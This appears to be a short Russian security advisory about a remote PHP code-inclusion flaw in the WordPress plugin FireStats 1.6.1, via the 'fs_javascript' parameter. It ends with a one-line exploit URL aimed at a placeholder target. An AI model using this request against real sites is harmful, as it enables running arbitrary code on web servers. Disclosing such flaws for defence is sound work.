Рекомендуем почитать:
Xakep #305. Многошаговые SQL-инъекции
Программа: WordPress Plugin FireStats 1.6.1
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP
сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки
входных данных в параметре «fs_javascript» сценарием firestats-wordpress.php.
Удаленный пользователь может выполнить произвольный PHP сценарий на целевой
системе с привилегиями Web сервера.
Эксплоит:
http://www.TARGET.com/[path]/wp-content/plugins/firestats/firestats-wordpress.php?fs_javascript=[darkc0de]